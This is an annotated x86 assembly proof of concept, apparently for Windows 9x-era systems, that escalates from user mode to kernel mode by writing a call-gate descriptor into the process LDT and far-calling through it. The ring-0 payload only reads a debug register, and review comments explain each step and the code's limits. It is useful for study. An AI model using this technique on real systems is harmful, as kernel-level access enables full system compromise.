;-----------------------------------------------------------------------------
; DETECT37.ASM - demonstration of a ring-3 -> ring-0 transition through a
; call gate written into the process LDT (see sprava1).
; Syntax: TASM/MASM Intel syntax, Win32 flat model, STDCALL.
; Flow:   install an unhandled-exception filter (chyba), patch LDT slot 1
;         with the gate in o_gate, far-call through call_ into ring0, clear
;         the slot, restore the filter, report success or failure.
; NOTE(review): the LDT write at Start only succeeds where the OS maps the
; LDT page writable for ring 3; elsewhere the store (or the far call) faults
; and the filter path reports "Nastala chyba". Presumably a Windows 9x-era
; demo - confirm against the target OS before drawing conclusions.
;-----------------------------------------------------------------------------
.386p
.MODEL FLAT,STDCALL
locals
jumps
UNICODE=0
include w32.inc
Extrn SetUnhandledExceptionFilter : PROC
.data
sprava1 db "Ukazka prepnutia do RING0 pomocou LDT",0
sprava2 db "Nastala chyba",0
sprava3 db "Ring0 bol uspesne aktivovany",0
odlozESP dd 0 ; ESP saved at Start; the SEH filter (chyba) pivots back to it
predchadzajuca dd 0 ; previous unhandled-exception filter, restored after the far call
gdt_ df 0 ; 6-byte GDTR image filled by sgdt (limit at +0, base at +2)
call_ dd 00 ; far pointer used by "call fword ptr [call_]": offset 0 ...
dw 0Fh ; ... selector 0Fh = LDT index 1, TI=1, RPL=3 (belongs to call_, not o_gate)
o_gate dw 0 ; 8-byte call-gate descriptor template: offset bits 0..15 (patched at Start)
dw 028h ; target code selector 028h, used by the author as the ring-0 code segment
dw 0EC00h ; access byte 0ECh = present, DPL 3, 32-bit call gate; param count 0
dw 0 ; offset bits 16..31 (patched at Start)
.code
Start:
;----------------------------------------------------------------------------
;INSTALL AN SEH FILTER IN CASE OF AN ERROR
;----------------------------------------------------------------------------
mov [odlozESP],esp ; remember ESP so chyba can unwind straight back to this frame
push offset chyba
call SetUnhandledExceptionFilter
mov [predchadzajuca], eax ; keep the previous filter so it can be reinstalled below
;----------------------------------------------------------------------------
mov eax, offset ring0 ; eax = linear offset of our ring-0 handler
mov [o_gate],ax ; offset bits 0..15 into the gate template
shr eax,16
mov [o_gate+6],ax ; offset bits 16..31 (bytes 6..7 of the gate)
xor eax, eax ; sldt writes only ax; clear the upper half first
sgdt fword ptr gdt_ ; gdt_ = GDTR
mov ebx,dword ptr [gdt_+2] ; ebx = GDT linear base
sldt ax ; ax = LDT selector (an index into the GDT)
add ebx,eax ; ebx = address of the LDT descriptor inside the GDT
mov al,[ebx+4] ; base bits 16..23
mov ah,[ebx+7] ; base bits 24..31
shl eax,16 ; move them into the upper half of eax
mov ax,[ebx+2] ; base bits 0..15 -> eax = LDT linear base
add eax,8 ; slot 1 of the LDT, the entry selector 0Fh (call_) refers to
mov edi,eax ; edi = destination: LDT slot 1
mov esi,offset o_gate ; esi = our 8-byte gate template
movsd ; copy the descriptor into the LDT (8 bytes in two dword stores);
movsd ; NOTE(review): this store is the step that faults where ring 3 cannot write the LDT
call fword ptr [call_] ; far call through selector 0Fh -> gate -> ring0; returns here via retf
xor eax, eax
sub edi,8 ; edi back to the patched slot (movsd advanced it by 8)
stosd ; zero the descriptor again
stosd
;----------------------------------------------------------------------------
;REINSTALL THE PREVIOUS SEH FILTER
;----------------------------------------------------------------------------
push dword ptr [predchadzajuca]
call SetUnhandledExceptionFilter
;----------------------------------------------------------------------------
jmp skok ; reached only if the far call returned: report success
continiue: ; entered from chyba after a fault anywhere above
; NOTE(review): on this path the LDT slot is not zeroed and the previous filter
; is not reinstalled - only the fall-through path above does both.
call MessageBoxA,0, offset sprava2, offset sprava1,0
call ExitProcess, -1
skok:
call MessageBoxA,0, offset sprava3, offset sprava1,0
call ExitProcess, -1 ; NOTE(review): success also exits with -1, same as the error path
chyba: ; unhandled-exception filter installed at Start; any fault in Start lands here
mov esp, [odlozESP] ; discard the filter's frame: pivot ESP back to the value saved at Start
push offset continiue ; push/ret = jump to continiue; the filter never returns to its caller,
ret ; so the normal filter return-value protocol is bypassed
;-----------------------------------------------------------------------------
;OUR NEW RING-0 HANDLER - reached through the call gate in o_gate
;-----------------------------------------------------------------------------
ring0:
mov eax, dr7 ; privileged instruction: faults with #GP unless CPL=0, so it doubles as the proof
retf ; far return through the gate back to ring 3, after "call fword ptr [call_]"
ends
end Start